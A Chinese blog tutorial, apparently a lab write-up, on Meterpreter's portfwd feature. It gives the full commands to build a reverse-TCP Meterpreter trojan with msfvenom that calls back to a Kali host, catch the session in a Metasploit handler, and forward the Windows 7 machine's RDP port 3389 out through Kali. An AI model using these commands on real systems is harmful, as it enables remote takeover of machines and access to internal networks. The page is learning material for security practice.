当前位置:网站首页>portfwd 端口转发
portfwd 端口转发
2022-07-24 17:04:00 【ailx10】
前面我们已经学习了ssh端口转发、防火墙端口转发、rinetd端口转发、nc端口转发、socat端口转发、portmap端口转发,今天我们来学习portfwd端口转发,portfwd 是meterpreter 中的一个功能,那么本次实验就先来制造一个小马,然后基于meterpreter的portfwd,实现远程端口转发,访问跳板机kali的1111端口,就能访问内网win7的3389端口,这也叫3389端口反弹~
实验环境:
- macos:192.168.199.206
- kali:192.168.199.247
- win7:192.168.199.185
1、生成一个小马
msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=5555 LHOST=192.168.199.247 -f exe > hack.exe
2、通过metasploit监听5555端口
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 5555
3、找个windows虚拟机,运行小马
exploit -j -z
sessions
4、进入sessions,然后使用portfwd进行端口转发
portfwd add -l 1111 -r 127.0.0.1 -p 3389
5、访问kali的1111端口,就是访问win7的3389端口

网络安全任重道远,洗洗睡吧~

边栏推荐
- 剑指 Offer 48. 最长不含重复字符的子字符串
- Interview question 01.02. determine whether it is character rearrangement
- JSP custom tag library -- select tag
- QT design simulation robot controller
- It's time to consider slimming down your app
- ShardingSphere数据库读写分离
- 安全:如何为行人提供更多保护
- 2022-07-21 Daily: Wu Enda wrote: how to establish projects suitable for AI career
- Logisim group experiment 10 single cycle MIPS CPU
- JS, call in the for loop is asynchronously converted to synchronous execution
猜你喜欢

Check the actual data growth of the database

小端格式和大端格式(Little-Endian&Big-Endian)

Still developing games with unity? Then you're out. Try unity to build an answer system

ArcGIS create vector

Implementation of side list menu (side menu) of wechat applet

1184. Distance between bus stops

SS-Paper【1】:Fully Convolutional Networks for Semantic Segmentation

Problems encountered in upgrading chrome to version 80 - solutions to system login failure

量化框架backtrader之一文读懂Indicator指标

CPU comparison
随机推荐
1309. Decode letter to integer mapping
804. Unique Morse code word
剑指 Offer 25. 合并两个排序的链表
1163: SongGe's score splitting (C language)
What is the meaning of void 0? Is undefined changeable?
QT keyboard event (I) -- detect key input
Internet Download Manager Configuration
.NET 测试框架 xUnit,MSTest, Specflow 使用经验汇总
Small end format and big end format (little endian & big endian)
regular expression
查数据库实际数据增长情况
EF LINQ Miscellany
Method of querying comma separated strings in a field by MySQL
SS-Paper【1】:Fully Convolutional Networks for Semantic Segmentation
内核开发
QT embed Notepad under win10
Xxx.pro learning in QT
Check the actual data growth of the database
Notebook computer purchase guide (specific brand and model are not recommended)
The third edition of New Horizon College English reading and Writing Tutorial 4 graduation examination site (units 1,2,3,5,6)